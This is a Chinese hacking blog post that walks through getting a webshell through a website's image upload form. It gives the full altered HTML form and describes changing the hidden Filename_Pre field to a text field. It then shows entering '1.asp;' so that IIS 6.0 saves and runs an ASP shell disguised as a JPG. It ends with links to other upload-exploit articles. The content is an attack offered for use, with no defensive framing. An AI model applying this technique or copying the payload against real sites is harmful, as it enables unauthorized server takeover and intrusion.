本文是由一个上传的页面突破上传引发的,话说当时群里议论纷纷。发出XXX网站的上传地址,研究过来研究过去。没找到突破,本地修改上传提交仍然不能突破。
就在当时,小三毛同志提出修改hidden to text利用IIS漏洞可取webshell。咱也试下这招数如何
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<LINK href="../css/css.css" rel=stylesheet type=text/css>
<title>上传图片</title>
</head>
<body leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="20" align="center">
</td>
</tr>
</table>
<table width="90%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#999999">
<form action="http://xxx.net/inn/upfilesave.asp" method="post" enctype="multipart/form-data">
<tr>
<td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="25" bgcolor="#CCCCCC" class="td_14">上传图片</td>
</tr>
</table></td>
</tr>
<tr>
<td height="35" align="center" bgcolor="#FFFFFF">
<input name="image" type="file" id="image">
</td>
</tr>
<tr>
<td height="35" align="center" bgcolor="#FFFFFF">
<input type="submit" name="Submit" value="提交" onClick="checkImage('image')">
<input name="PathFolder" type="hidden" id="PathFolder" value="/img/trade/">
<input name="FormName" type="hidden" id="FormName" value="add">
<input name="parent" type="hidden" id="parent" value="img">
<input name="Filename_Pre" type="text" id="Filename_Pre" value="">
<input name="Create" type="hidden" id="Create" value="">
<input type="reset" name="Submit2" value="关闭" onClick="javascript:window.close()">
</td>
</tr>
</form>
</table>
</body>
</html>
<script language=javascript>
function checkImage(sId)
{
if(( document.all[sId].value.indexOf(".asp") == -1) && (document.all[sId].value.indexOf(".asa") == -1)) {
//alert("请选择gif或jpg的图象文件");
// event.returnValue = false;
}
}
</script>
保存为HTML。。。
原来
<input name="Filename_Pre" type="hidden" id="Filename_Pre" value="">
修改
<input name="Filename_Pre" type="text" id="Filename_Pre" value="">
打开本地HTML提交页,上传时填充1.asp;。
成功返回1.asp;_201036165716.jpg。IIS 6.0,成功运行小马~
只显示10条记录相关文章
upfile 又一奇迹般的突破 (浏览: 8328, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 10158, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 10086, 评论: 0)
深度学习asp整站系统oday (浏览: 8665, 评论: 0)
微尔文章系统v1.51 (修正版)上传漏洞 (浏览: 10681, 评论: 0)
Es_Cms上传漏洞利用 (浏览: 9475, 评论: 0)
良精微博系统上传漏洞 (浏览: 12714, 评论: 0)
尘月网络企业网站管理系统2010生成HTML专业版之上传漏洞 (浏览: 11701, 评论: 0)
一个上传文件的分析笔记 (浏览: 10562, 评论: 0)